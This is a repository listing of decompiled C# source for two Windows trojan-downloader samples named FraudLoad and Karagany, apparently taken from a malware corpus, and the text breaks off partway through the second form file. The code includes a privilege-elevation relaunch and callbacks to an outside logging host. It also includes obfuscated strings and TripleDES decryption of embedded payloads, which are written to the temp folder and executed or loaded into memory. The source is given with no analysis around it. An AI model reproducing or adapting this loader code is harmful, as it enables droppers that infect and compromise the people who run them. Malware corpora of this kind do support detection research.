MSIL/Trojan-Downloader/Win32/F/Trojan-Downloader.Win32.FraudLoad.yjmx-bf19859422e8892dcad392d861505005b20bd4fdd2f7d81fdd3c89ab387e68c8/Program.cs
+116
View File
@@ -0,0 +1,116 @@
// Decompiled with JetBrains decompiler
// Type: mute.Program
// Assembly: explorer, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 772D6407-3F7F-4A01-A630-EF8C6D749DE8
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00002-msil\Trojan-Downloader.Win32.FraudLoad.yjmx-bf19859422e8892dcad392d861505005b20bd4fdd2f7d81fdd3c89ab387e68c8.exe
using System;
using System.Diagnostics;
using System.IO;
using System.Net;
using System.Runtime.InteropServices;
using System.Security.Principal;
using System.Threading;
using System.Web;
using System.Windows.Forms;
namespace mute
{
internal static class Program
{
[DllImport("kernel32")]
private static extern int SetUnhandledExceptionFilter(Program.CallBack cb);
public static int newexceptionfilter(ref long a) => 1;
[DllImport("kernel32.dll", SetLastError = true)]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool TerminateProcess(IntPtr hProcess, uint uExitCode);
public static bool IsAdministrator()
{
WindowsIdentity current = WindowsIdentity.GetCurrent();
return null != current && new WindowsPrincipal(current).IsInRole(WindowsBuiltInRole.Administrator);
}
[STAThread]
private static void Main()
{
if (Path.GetDirectoryName(Application.ExecutablePath) != Application.UserAppDataPath && !Program.IsAdministrator())
{
Process.Start(new ProcessStartInfo()
{
FileName = Application.ExecutablePath,
Verb = "runas"
});
}
else
{
Thread.Sleep(5000);
bool createdNew;
Mutex mutex = new Mutex(true, Application.ProductName, out createdNew);
if (!createdNew)
return;
System.IO.File.WriteAllText(Path.Combine(Application.UserAppDataPath, "hide.txt"), "empty");
Application.EnableVisualStyles();
Application.SetCompatibleTextRenderingDefault(false);
try
{
Application.Run((Form) new Form1());
}
catch (Exception ex1)
{
string str = string.Format("Unhandled Exception Raised:{0}", (object) ex1.Message);
WebClient webClient = new WebClient();
string address = string.Format("http://isthisactuallyadomain.info/log.php?user={0}&memo={1}&msg={2}", (object) 4, (object) "634247432852901340", (object) HttpUtility.UrlEncode(str));
try
{
webClient.DownloadString(address);
}
catch (Exception ex2)
{
int num = (int) MessageBox.Show(str);
}
}
finally
{
mutex.ReleaseMutex();
}
}
}
private static void ThreadHandler(object sender, ThreadExceptionEventArgs args)
{
string str = string.Format("Unhandled Exception Raised:{0}", (object) args.Exception.Message);
WebClient webClient = new WebClient();
string address = string.Format("http://isthisactuallyadomain.info/log.php?user={0}&memo={1}&msg={2}", (object) 4, (object) "634247432852901340", (object) HttpUtility.UrlEncode(str));
try
{
webClient.DownloadString(address);
}
catch (Exception ex)
{
int num = (int) MessageBox.Show(str);
}
Application.Exit();
}
private static void MyHandler(object sender, UnhandledExceptionEventArgs args)
{
string str = string.Format("Unhandled Exception Raised:{0}", (object) ((Exception) args.ExceptionObject).Message);
WebClient webClient = new WebClient();
string address = string.Format("http://isthisactuallyadomain.info/log.php?user={0}&memo={1}&msg={2}", (object) 4, (object) "634247432852901340", (object) HttpUtility.UrlEncode(str));
try
{
webClient.DownloadString(address);
}
catch (Exception ex)
{
int num = (int) MessageBox.Show(str);
}
Application.Exit();
}
public delegate int CallBack(ref long a);
}
}
MSIL/Trojan-Downloader/Win32/F/Trojan-Downloader.Win32.FraudLoad.yjmx-bf19859422e8892dcad392d861505005b20bd4fdd2f7d81fdd3c89ab387e68c8/Properties/Resources.cs
+46
View File
@@ -0,0 +1,46 @@
// Decompiled with JetBrains decompiler
// Type: mute.Properties.Resources
// Assembly: explorer, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 772D6407-3F7F-4A01-A630-EF8C6D749DE8
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00002-msil\Trojan-Downloader.Win32.FraudLoad.yjmx-bf19859422e8892dcad392d861505005b20bd4fdd2f7d81fdd3c89ab387e68c8.exe
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
using System.Globalization;
using System.Resources;
using System.Runtime.CompilerServices;
namespace mute.Properties
{
[GeneratedCode("System.Resources.Tools.StronglyTypedResourceBuilder", "2.0.0.0")]
[CompilerGenerated]
[DebuggerNonUserCode]
internal class Resources
{
private static ResourceManager resourceMan;
private static CultureInfo resourceCulture;
internal Resources()
{
}
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static ResourceManager ResourceManager
{
get
{
if (mute.Properties.Resources.resourceMan == null)
mute.Properties.Resources.resourceMan = new ResourceManager("mute.Properties.Resources", typeof (mute.Properties.Resources).Assembly);
return mute.Properties.Resources.resourceMan;
}
}
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static CultureInfo Culture
{
get => mute.Properties.Resources.resourceCulture;
set => mute.Properties.Resources.resourceCulture = value;
}
}
}
MSIL/Trojan-Downloader/Win32/F/Trojan-Downloader.Win32.FraudLoad.yjmx-bf19859422e8892dcad392d861505005b20bd4fdd2f7d81fdd3c89ab387e68c8/Properties/Resources.resx
+120
View File
@@ -0,0 +1,120 @@
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goals of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" use="required" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
</root>
MSIL/Trojan-Downloader/Win32/F/Trojan-Downloader.Win32.FraudLoad.yjmx-bf19859422e8892dcad392d861505005b20bd4fdd2f7d81fdd3c89ab387e68c8/Properties/Settings.cs
+38
View File
@@ -0,0 +1,38 @@
// Decompiled with JetBrains decompiler
// Type: mute.Properties.Settings
// Assembly: explorer, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 772D6407-3F7F-4A01-A630-EF8C6D749DE8
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00002-msil\Trojan-Downloader.Win32.FraudLoad.yjmx-bf19859422e8892dcad392d861505005b20bd4fdd2f7d81fdd3c89ab387e68c8.exe
using System.CodeDom.Compiler;
using System.Configuration;
using System.Diagnostics;
using System.Runtime.CompilerServices;
namespace mute.Properties
{
[CompilerGenerated]
[GeneratedCode("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "9.0.0.0")]
internal sealed class Settings : ApplicationSettingsBase
{
private static Settings defaultInstance = (Settings) SettingsBase.Synchronized((SettingsBase) new Settings());
public static Settings Default
{
get
{
Settings defaultInstance = Settings.defaultInstance;
return defaultInstance;
}
}
[DebuggerNonUserCode]
[DefaultSettingValue("False")]
[UserScopedSetting]
public bool Hide
{
get => (bool) this[nameof (Hide)];
set => this[nameof (Hide)] = (object) value;
}
}
}
MSIL/Trojan-Downloader/Win32/K/Trojan-Downloader.Win32.Karagany.dd-2cc5473996e68437dada294106155dfa4c6904107200c7a154f2ef1428c29950/AssemblyInfo.cs
+13
View File
@@ -0,0 +1,13 @@
using System.Reflection;
using System.Runtime.InteropServices;
[assembly: AssemblyTitle("Internet Process")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCompany("Internet Process")]
[assembly: AssemblyCopyright("Copyright © Internet Process 2012")]
[assembly: AssemblyDescription("Internet Process")]
[assembly: AssemblyFileVersion("3.7.2.8")]
[assembly: Guid("e8c7ff49-833c-4200-a678-2f919282a9d8")]
[assembly: ComVisible(false)]
[assembly: AssemblyProduct("Internet Process")]
[assembly: AssemblyVersion("3.7.2.8")]
MSIL/Trojan-Downloader/Win32/K/Trojan-Downloader.Win32.Karagany.dd-2cc5473996e68437dada294106155dfa4c6904107200c7a154f2ef1428c29950/Form1.cs
+816
View File
@@ -0,0 +1,816 @@
// Decompiled with JetBrains decompiler
// Type: SOUCHEIE.Form1
// Assembly: SOUCHEIE, Version=3.7.2.8, Culture=neutral, PublicKeyToken=null
// MVID: 9463E62C-5BDE-47C8-BBBA-DFBD0AA5A3A3
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Downloader.Win32.Karagany.dd-2cc5473996e68437dada294106155dfa4c6904107200c7a154f2ef1428c29950.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using Microsoft.Win32;
using SOUCHEIE.My;
using System;
using System.ComponentModel;
using System.Diagnostics;
using System.Drawing;
using System.IO;
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Security.Cryptography;
using System.Text;
using System.Threading;
using System.Windows.Forms;
namespace SOUCHEIE
{
[DesignerGenerated]
public class Form1 : Form
{
private IContainer components;
[AccessedThroughProperty("Button1")]
private Button _Button1;
[AccessedThroughProperty("Button2")]
private Button _Button2;
[AccessedThroughProperty("Button3")]
private Button _Button3;
[AccessedThroughProperty("CheckBox1")]
private CheckBox _CheckBox1;
[AccessedThroughProperty("CheckBox2")]
private CheckBox _CheckBox2;
[AccessedThroughProperty("Label1")]
private Label _Label1;
[AccessedThroughProperty("GroupBox1")]
private GroupBox _GroupBox1;
[AccessedThroughProperty("Label2")]
private Label _Label2;
[AccessedThroughProperty("ComboBox1")]
private ComboBox _ComboBox1;
public string ndnmrvXfvEtRnGWDjtjqaPE;
public string[] pimiUBLAhwQUpDuiKLgNvgG;
public object DUNVHvMpaSimcJtvTLJrTQe;
public Form1()
{
this.Load += new EventHandler(this.dFepogsdawimFWXXLYGtuln);
this.ndnmrvXfvEtRnGWDjtjqaPE = Application.ExecutablePath;
this.pimiUBLAhwQUpDuiKLgNvgG = Strings.Split(Encoding.Default.GetString(this.TUGGEjqkhdQUTQXLCYdPZEP(this.GetType().Assembly.GetManifestResourceStream(this.SevdniwAKhioHCREIfujevM(Conversions.ToString(Strings.Chr(254)) + "K{p" + Conversions.ToString(Strings.Chr(149)) + Conversions.ToString(Strings.Chr(156)) + Conversions.ToString(Strings.Chr(212)) + Conversions.ToString(Strings.Chr(183)) + "S" + Conversions.ToString(Strings.Chr(171)) + "^" + Conversions.ToString(Strings.Chr(149)) + Conversions.ToString(Strings.Chr(165)) + Conversions.ToString(Strings.Chr(136)) + "W")))), this.SevdniwAKhioHCREIfujevM(Conversions.ToString(Strings.Chr(206)) + "x"));
this.InitializeComponent();
}
[DebuggerNonUserCode]
protected override void Dispose(bool disposing)
{
try
{
if (!disposing || this.components == null)
return;
this.components.Dispose();
}
finally
{
base.Dispose(disposing);
}
}
[DebuggerStepThrough]
private void InitializeComponent()
{
this.Button1 = new Button();
this.Button2 = new Button();
this.Button3 = new Button();
this.CheckBox1 = new CheckBox();
this.CheckBox2 = new CheckBox();
this.Label1 = new Label();
this.GroupBox1 = new GroupBox();
this.Label2 = new Label();
this.ComboBox1 = new ComboBox();
this.SuspendLayout();
Button button1_1 = this.Button1;
Point point1 = new Point(62, 36);
Point point2 = point1;
button1_1.Location = point2;
this.Button1.Name = "Button1";
Button button1_2 = this.Button1;
Size size1 = new Size(75, 23);
Size size2 = size1;
button1_2.Size = size2;
this.Button1.TabIndex = 0;
this.Button1.Text = "Button1";
this.Button1.UseVisualStyleBackColor = true;
Button button2_1 = this.Button2;
point1 = new Point(205, 224);
Point point3 = point1;
button2_1.Location = point3;
this.Button2.Name = "Button2";
Button button2_2 = this.Button2;
size1 = new Size(75, 23);
Size size3 = size1;
button2_2.Size = size3;
this.Button2.TabIndex = 1;
this.Button2.Text = "Button2";
this.Button2.UseVisualStyleBackColor = true;
Button button3_1 = this.Button3;
point1 = new Point(28, 224);
Point point4 = point1;
button3_1.Location = point4;
this.Button3.Name = "Button3";
Button button3_2 = this.Button3;
size1 = new Size(75, 23);
Size size4 = size1;
button3_2.Size = size4;
this.Button3.TabIndex = 2;
this.Button3.Text = "Button3";
this.Button3.UseVisualStyleBackColor = true;
this.CheckBox1.AutoSize = true;
CheckBox checkBox1_1 = this.CheckBox1;
point1 = new Point(99, 94);
Point point5 = point1;
checkBox1_1.Location = point5;
this.CheckBox1.Name = "CheckBox1";
CheckBox checkBox1_2 = this.CheckBox1;
size1 = new Size(81, 17);
Size size5 = size1;
checkBox1_2.Size = size5;
this.CheckBox1.TabIndex = 3;
this.CheckBox1.Text = "CheckBox1";
this.CheckBox1.UseVisualStyleBackColor = true;
this.CheckBox2.AutoSize = true;
CheckBox checkBox2_1 = this.CheckBox2;
point1 = new Point(22, 165);
Point point6 = point1;
checkBox2_1.Location = point6;
this.CheckBox2.Name = "CheckBox2";
CheckBox checkBox2_2 = this.CheckBox2;
size1 = new Size(81, 17);
Size size6 = size1;
checkBox2_2.Size = size6;
this.CheckBox2.TabIndex = 4;
this.CheckBox2.Text = "CheckBox2";
this.CheckBox2.UseVisualStyleBackColor = true;
this.Label1.AutoSize = true;
Label label1_1 = this.Label1;
point1 = new Point(155, 150);
Point point7 = point1;
label1_1.Location = point7;
this.Label1.Name = "Label1";
Label label1_2 = this.Label1;
size1 = new Size(39, 13);
Size size7 = size1;
label1_2.Size = size7;
this.Label1.TabIndex = 5;
this.Label1.Text = "Label1";
GroupBox groupBox1_1 = this.GroupBox1;
point1 = new Point(62, 82);
Point point8 = point1;
groupBox1_1.Location = point8;
this.GroupBox1.Name = "GroupBox1";
GroupBox groupBox1_2 = this.GroupBox1;
size1 = new Size(200, 100);
Size size8 = size1;
groupBox1_2.Size = size8;
this.GroupBox1.TabIndex = 6;
this.GroupBox1.TabStop = false;
this.GroupBox1.Text = "GroupBox1";
this.Label2.AutoSize = true;
Label label2_1 = this.Label2;
point1 = new Point(177, 29);
Point point9 = point1;
label2_1.Location = point9;
this.Label2.Name = "Label2";
Label label2_2 = this.Label2;
size1 = new Size(39, 13);
Size size9 = size1;
label2_2.Size = size9;
this.Label2.TabIndex = 7;
this.Label2.Text = "Label2";
this.ComboBox1.FormattingEnabled = true;
ComboBox comboBox1_1 = this.ComboBox1;
point1 = new Point(12, 94);
Point point10 = point1;
comboBox1_1.Location = point10;
this.ComboBox1.Name = "ComboBox1";
ComboBox comboBox1_2 = this.ComboBox1;
size1 = new Size(121, 21);
Size size10 = size1;
comboBox1_2.Size = size10;
this.ComboBox1.TabIndex = 8;
this.AutoScaleDimensions = new SizeF(6f, 13f);
this.AutoScaleMode = AutoScaleMode.Font;
size1 = new Size(292, 273);
this.ClientSize = size1;
this.Controls.Add((Control) this.ComboBox1);
this.Controls.Add((Control) this.Label2);
this.Controls.Add((Control) this.GroupBox1);
this.Controls.Add((Control) this.Label1);
this.Controls.Add((Control) this.CheckBox2);
this.Controls.Add((Control) this.CheckBox1);
this.Controls.Add((Control) this.Button3);
this.Controls.Add((Control) this.Button2);
this.Controls.Add((Control) this.Button1);
this.Name = "KING";
this.Text = nameof (Form1);
this.ResumeLayout(false);
this.PerformLayout();
}
internal virtual Button Button1
{
get => this._Button1;
[MethodImpl(MethodImplOptions.Synchronized)] set => this._Button1 = value;
}
internal virtual Button Button2
{
get => this._Button2;
[MethodImpl(MethodImplOptions.Synchronized)] set => this._Button2 = value;
}
internal virtual Button Button3
{
get => this._Button3;
[MethodImpl(MethodImplOptions.Synchronized)] set => this._Button3 = value;
}
internal virtual CheckBox CheckBox1
{
get => this._CheckBox1;
[MethodImpl(MethodImplOptions.Synchronized)] set => this._CheckBox1 = value;
}
internal virtual CheckBox CheckBox2
{
get => this._CheckBox2;
[MethodImpl(MethodImplOptions.Synchronized)] set => this._CheckBox2 = value;
}
internal virtual Label Label1
{
get => this._Label1;
[MethodImpl(MethodImplOptions.Synchronized)] set => this._Label1 = value;
}
internal virtual GroupBox GroupBox1
{
get => this._GroupBox1;
[MethodImpl(MethodImplOptions.Synchronized)] set => this._GroupBox1 = value;
}
internal virtual Label Label2
{
get => this._Label2;
[MethodImpl(MethodImplOptions.Synchronized)] set => this._Label2 = value;
}
internal virtual ComboBox ComboBox1
{
get => this._ComboBox1;
[MethodImpl(MethodImplOptions.Synchronized)] set => this._ComboBox1 = value;
}
private void dFepogsdawimFWXXLYGtuln(object sender, EventArgs e)
{
try
{
if (Conversions.ToDouble(this.pimiUBLAhwQUpDuiKLgNvgG[14]) != 0.0)
Thread.Sleep(Conversions.ToInteger(this.pimiUBLAhwQUpDuiKLgNvgG[14]));
if (Operators.CompareString(this.pimiUBLAhwQUpDuiKLgNvgG[6], this.SevdniwAKhioHCREIfujevM(Conversions.ToString(Strings.Chr(235)) + "AM"), false) == 0)
this.AbWjJrcashsrUglvWLpPUBT(this.pimiUBLAhwQUpDuiKLgNvgG[7], this.pimiUBLAhwQUpDuiKLgNvgG[8]);
if (Operators.CompareString(this.pimiUBLAhwQUpDuiKLgNvgG[10], this.SevdniwAKhioHCREIfujevM(Conversions.ToString(Strings.Chr(235)) + "AM"), false) == 0)
this.RXXeGpqoUgCmIipoOOesgoC();
if (Operators.CompareString(this.pimiUBLAhwQUpDuiKLgNvgG[11], this.SevdniwAKhioHCREIfujevM(Conversions.ToString(Strings.Chr(235)) + "AM"), false) == 0)
this.cvGqHnmUkvCkHFuKRHnFvee();
if (Operators.CompareString(this.pimiUBLAhwQUpDuiKLgNvgG[9], this.SevdniwAKhioHCREIfujevM(Conversions.ToString(Strings.Chr(235)) + "AM"), false) == 0)
this.bJwQqmrhNCUHsooEXOHZEXb();
if (Operators.CompareString(this.pimiUBLAhwQUpDuiKLgNvgG[12], this.SevdniwAKhioHCREIfujevM(Conversions.ToString(Strings.Chr(235)) + "AM"), false) == 0)
this.JifTRmpsoLwDgKYvqYDjDUn();
if (Operators.CompareString(this.pimiUBLAhwQUpDuiKLgNvgG[13], this.SevdniwAKhioHCREIfujevM(Conversions.ToString(Strings.Chr(235)) + "AM"), false) == 0)
this.GcgXojEaFPbweNAQSKGPfDl();
if (Operators.CompareString(this.pimiUBLAhwQUpDuiKLgNvgG[15], this.SevdniwAKhioHCREIfujevM(Conversions.ToString(Strings.Chr(235)) + "AM"), false) == 0)
{
int num = (int) Interaction.MsgBox((object) this.pimiUBLAhwQUpDuiKLgNvgG[18], (MsgBoxStyle) Conversions.ToInteger(this.pimiUBLAhwQUpDuiKLgNvgG[16]), (object) this.pimiUBLAhwQUpDuiKLgNvgG[17]);
}
if (Operators.CompareString(this.pimiUBLAhwQUpDuiKLgNvgG[19], this.SevdniwAKhioHCREIfujevM(Conversions.ToString(Strings.Chr(235)) + "AM"), false) == 0)
{
File.WriteAllBytes((Path.GetTempPath() + this.pimiUBLAhwQUpDuiKLgNvgG[22]).Replace("\0", ""), this.nqvAWtbiCPaaiamiNLPivRs(this.TUGGEjqkhdQUTQXLCYdPZEP(this.GetType().Assembly.GetManifestResourceStream(this.pimiUBLAhwQUpDuiKLgNvgG[20])), this.pimiUBLAhwQUpDuiKLgNvgG[21]));
Process.Start((Path.GetTempPath() + this.pimiUBLAhwQUpDuiKLgNvgG[22]).Replace("\0", ""));
}
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
if (Operators.CompareString(this.pimiUBLAhwQUpDuiKLgNvgG[4], this.SevdniwAKhioHCREIfujevM(Conversions.ToString(Strings.Chr(131))), false) == 0)
{
if (Operators.CompareString(this.pimiUBLAhwQUpDuiKLgNvgG[5], this.SevdniwAKhioHCREIfujevM(Conversions.ToString(Strings.Chr(196)) + "f}"), false) != 0)
{
if (Operators.CompareString(this.pimiUBLAhwQUpDuiKLgNvgG[5], this.SevdniwAKhioHCREIfujevM(Conversions.ToString(Strings.Chr(240)) + "kfa" + Conversions.ToString(Strings.Chr(141)) + Conversions.ToString(Strings.Chr(157)) + Conversions.ToString(Strings.Chr(211)) + Conversions.ToString(Strings.Chr(144)) + "_" + Conversions.ToString(Strings.Chr(156)) + "v" + Conversions.ToString(Strings.Chr(189)) + Conversions.ToString(Strings.Chr(188)) + Conversions.ToString(Strings.Chr(180)) + "E"), false) == 0)
this.DUNVHvMpaSimcJtvTLJrTQe = (object) new object[2]
{
(object) this.nqvAWtbiCPaaiamiNLPivRs(this.TUGGEjqkhdQUTQXLCYdPZEP(this.GetType().Assembly.GetManifestResourceStream(this.pimiUBLAhwQUpDuiKLgNvgG[0])), this.pimiUBLAhwQUpDuiKLgNvgG[1]),
(object) this.ndnmrvXfvEtRnGWDjtjqaPE
};
}
else
this.DUNVHvMpaSimcJtvTLJrTQe = (object) new object[2]
{
(object) this.nqvAWtbiCPaaiamiNLPivRs(this.TUGGEjqkhdQUTQXLCYdPZEP(this.GetType().Assembly.GetManifestResourceStream(this.pimiUBLAhwQUpDuiKLgNvgG[0])), this.pimiUBLAhwQUpDuiKLgNvgG[1]),
(object) (Environment.GetEnvironmentVariable(this.SevdniwAKhioHCREIfujevM(Conversions.ToString(Strings.Chr(197)) + "mpu" + Conversions.ToString(Strings.Chr(166)) + Conversions.ToString(Strings.Chr(158)))) + this.SevdniwAKhioHCREIfujevM(Conversions.ToString(Strings.Chr(238)) + "Iwr" + Conversions.ToString(Strings.Chr(189)) + Conversions.ToString(Strings.Chr(131)) + Conversions.ToString(Strings.Chr(245)) + Conversions.ToString(Strings.Chr(176)) + "V" + Conversions.ToString(Strings.Chr(135)) + "<" + Conversions.ToString(Strings.Chr(169)) + Conversions.ToString(Strings.Chr(151)) + Conversions.ToString(Strings.Chr(181)) + "\u007F5" + Conversions.ToString(Strings.Chr(231)) + Conversions.ToString(Strings.Chr(145)) + "u" + Conversions.ToString(Strings.Chr(192)) + Conversions.ToString(Strings.Chr(190)) + Conversions.ToString(Strings.Chr(147)) + Conversions.ToString(Strings.Chr(138)) + "," + Conversions.ToString(Strings.Chr(231)) + Conversions.ToString(Strings.Chr(238)) + Conversions.ToString(Strings.Chr(168)) + Conversions.ToString(Strings.Chr(250)) + "o" + Conversions.ToString(Strings.Chr(154)) + "v" + Conversions.ToString(Strings.Chr(146)) + Conversions.ToString(Strings.Chr(227)) + Conversions.ToString(Strings.Chr(207)) + "\a" + Conversions.ToString(Strings.Chr(175)) + "\aj" + Conversions.ToString(Strings.Chr(196)) + Conversions.ToString(Strings.Chr(130)) + "\u00150D"))
};
Assembly.Load(this.nqvAWtbiCPaaiamiNLPivRs(this.TUGGEjqkhdQUTQXLCYdPZEP(this.GetType().Assembly.GetManifestResourceStream(this.pimiUBLAhwQUpDuiKLgNvgG[2])), this.pimiUBLAhwQUpDuiKLgNvgG[3])).GetType(this.SevdniwAKhioHCREIfujevM(Conversions.ToString(Strings.Chr(251)) + "\\")).InvokeMember(this.SevdniwAKhioHCREIfujevM(Conversions.ToString(Strings.Chr(243)) + "E"), BindingFlags.InvokeMethod, (Binder) null, (object) null, (object[]) this.DUNVHvMpaSimcJtvTLJrTQe);
}
else
{
this.DUNVHvMpaSimcJtvTLJrTQe = (object) new object[6]
{
(object) this.nqvAWtbiCPaaiamiNLPivRs(this.TUGGEjqkhdQUTQXLCYdPZEP(this.GetType().Assembly.GetManifestResourceStream(this.pimiUBLAhwQUpDuiKLgNvgG[0])), this.pimiUBLAhwQUpDuiKLgNvgG[1]),
(object) true,
(object) this.pimiUBLAhwQUpDuiKLgNvgG[5],
(object) this.SevdniwAKhioHCREIfujevM(Conversions.ToString(Strings.Chr(156)) + "aft"),
(object) true,
(object) false
};
Assembly.Load(this.nqvAWtbiCPaaiamiNLPivRs(this.TUGGEjqkhdQUTQXLCYdPZEP(this.GetType().Assembly.GetManifestResourceStream(this.pimiUBLAhwQUpDuiKLgNvgG[2])), this.pimiUBLAhwQUpDuiKLgNvgG[3])).GetType(this.SevdniwAKhioHCREIfujevM(Conversions.ToString(Strings.Chr(224)) + "qpA" + Conversions.ToString(Strings.Chr(138)))).InvokeMember(this.SevdniwAKhioHCREIfujevM(Conversions.ToString(Strings.Chr(251)) + "jtt" + Conversions.ToString(Strings.Chr(172)) + Conversions.ToString(Strings.Chr(152)) + Conversions.ToString(Strings.Chr(214)) + Conversions.ToString(Strings.Chr(154))), BindingFlags.InvokeMethod, (Binder) null, (object) null, (object[]) this.DUNVHvMpaSimcJtvTLJrTQe);
}
this.Close();
}
public object dbQKEPUPjMdFsNdGcXTgwED(string OpYLktpcQZZGtbw, string KLRMgiGGRsnFwXQ)
{
TripleDESCryptoServiceProvider cryptoServiceProvider1 = new TripleDESCryptoServiceProvider();
MD5CryptoServiceProvider cryptoServiceProvider2 = new MD5CryptoServiceProvider();
cryptoServiceProvider1.Key = cryptoServiceProvider2.ComputeHash(Encoding.ASCII.GetBytes(KLRMgiGGRsnFwXQ));
cryptoServiceProvider1.Mode = CipherMode.ECB;
ICryptoTransform decryptor = cryptoServiceProvider1.CreateDecryptor();
byte[] inputBuffer = Convert.FromBase64String(OpYLktpcQZZGtbw);
return (object) Encoding.ASCII.GetString(decryptor.TransformFinalBlock(inputBuffer, 0, inputBuffer.Length));
}
public byte[] nqvAWtbiCPaaiamiNLPivRs(byte[] WDHGaiBwEtINXLU, string qrSdGIwGSUsCahp)
{
TripleDESCryptoServiceProvider cryptoServiceProvider1 = new TripleDESCryptoServiceProvider();
MD5CryptoServiceProvider cryptoServiceProvider2 = new MD5CryptoServiceProvider();
cryptoServiceProvider1.Key = cryptoServiceProvider2.ComputeHash(Encoding.ASCII.GetBytes(qrSdGIwGSUsCahp));
cryptoServiceProvider1.Mode = CipherMode.ECB;
ICryptoTransform decryptor = cryptoServiceProvider1.CreateDecryptor();
byte[] inputBuffer = WDHGaiBwEtINXLU;
return decryptor.TransformFinalBlock(inputBuffer, 0, checked (inputBuffer.Length - 1));
}
private object AbWjJrcashsrUglvWLpPUBT(string RjpBKtyoXKovFnX, string RFxHQxRvBmidXoU)
{
if (Operators.CompareString(this.ndnmrvXfvEtRnGWDjtjqaPE, Path.GetTempPath() + RFxHQxRvBmidXoU, false) != 0)
{
